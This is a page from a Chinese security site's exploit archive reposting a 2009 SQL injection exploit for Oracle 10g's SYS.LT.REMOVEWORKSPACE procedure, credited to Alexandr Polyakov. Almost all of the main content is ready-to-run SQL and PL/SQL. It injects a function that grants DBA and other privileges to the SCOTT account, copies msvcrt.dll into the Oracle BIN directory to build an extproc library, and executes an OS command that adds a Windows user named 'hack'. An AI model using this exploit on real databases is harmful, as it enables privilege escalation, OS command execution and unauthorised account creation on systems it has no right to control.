首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Oracle 10g SYS.LT.REMOVEWORKSPACE SQL Injection Exploit 来源：http://www.dsecrg.ru 作者：Polyakov 发布时间：2009-01-07   /*********************************************************/ /*Oracle 10g SYS.LT.REMOVEWORKSPACE SQL Injection Exploit*/ /****grant DBA and create new  OS user (advanced extproc)*/ /*********************************************************/ /***********exploit grant DBA to scott********************/ /***********and execute OS command "net user"*************/ /***********using advanced extproc method*****************/ /*********************************************************/ /***********tested on oracle 10.1.0.5.0*******************/ /*********************************************************/ /*********************************************************/ /* Date of Public EXPLOIT: January 6, 2009               */ /* Written by:             Alexandr "Sh2kerr" Polyakov   */ /* email:                  Alexandr.Polyakov@dsec.ru     */ /* site:                   http://www.dsecrg.ru          */ /*    http://www.dsec.ru            */ /*********************************************************/ /*Original Advisory:                                     */ /*Esteban Martinez Fayo [Team SHATTER ]                  */ /*Date of Public Advisory: November 11, 2008             */ /*http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml*/ /*********************************************************/ select * from user_role_privs; CREATE OR REPLACE FUNCTION X return varchar2 authid current_user as pragma autonomous_transaction; BEGIN EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT'; EXECUTE IMMEDIATE 'GRANT CREATE ANY DIRECTORY TO SCOTT'; EXECUTE IMMEDIATE 'GRANT CREATE ANY LIBRARY TO SCOTT'; EXECUTE IMMEDIATE 'GRANT EXECUTE ON SYS.DBMS_FILE_TRANSFER TO SCOTT'; COMMIT; RETURN 'X'; END; / exec SYS.LT.CREATEWORKSPACE('sh2kerr'' and SCOTT.X()=''X'); exec SYS.LT.REMOVEWORKSPACE('sh2kerr'' and SCOTT.X()=''X'); /* bypassing extproc limitation by copying msvcrt.dll to $ORACLE_HOME\BIN */ /* this method works in 10g and 11g database versions with updates        */ CREATE OR REPLACE DIRECTORY copy_dll_from AS 'C:\Windows\system32'; CREATE OR REPLACE DIRECTORY copy_dll_to AS   'C:\Oracle\product\10.1.0\db_1\BIN'; BEGIN   SYS.DBMS_FILE_TRANSFER.COPY_FILE(    source_directory_object      => 'copy_dll_from',    source_file_name             => 'msvcrt.dll',    destination_directory_object => 'copy_dll_to',    destination_file_name        => 'msvcrt.dll'); END; / CREATE OR REPLACE LIBRARY extproc_shell AS 'C:\Oracle\product\10.1.0\db_1\bin\msvcrt.dll'; / CREATE OR REPLACE PROCEDURE extprocexec (cmdstring IN CHAR) IS EXTERNAL NAME "system" LIBRARY extproc_shell LANGUAGE C; / /* here we can paste any OS command for example create new user */ EXEC extprocexec('net user hack 12345 /add'); / select * from user_role_privs;   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Safari (Arguments) Array Integ ·Oracle 10g SYS.LT.MERGEWORKSPA ·PHPAuctionSystem (XSS/SQL) Mul ·Oracle 10g SYS.LT.COMPRESSWORK ·VUPlayer 2.49 (.wax File) Loca ·RiotPix <= 0.61 (forumid) Blin ·Joomla com_phocadocumentation ·Debian GNU/Linux XTERM (DECRQS ·oomla com_na_newsdescription ( ·Goople <= 1.8.2 (frontpage.php ·Cybershade CMS 0.2b (index.php ·Rosoft Media Player 4.2.1 Loca   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved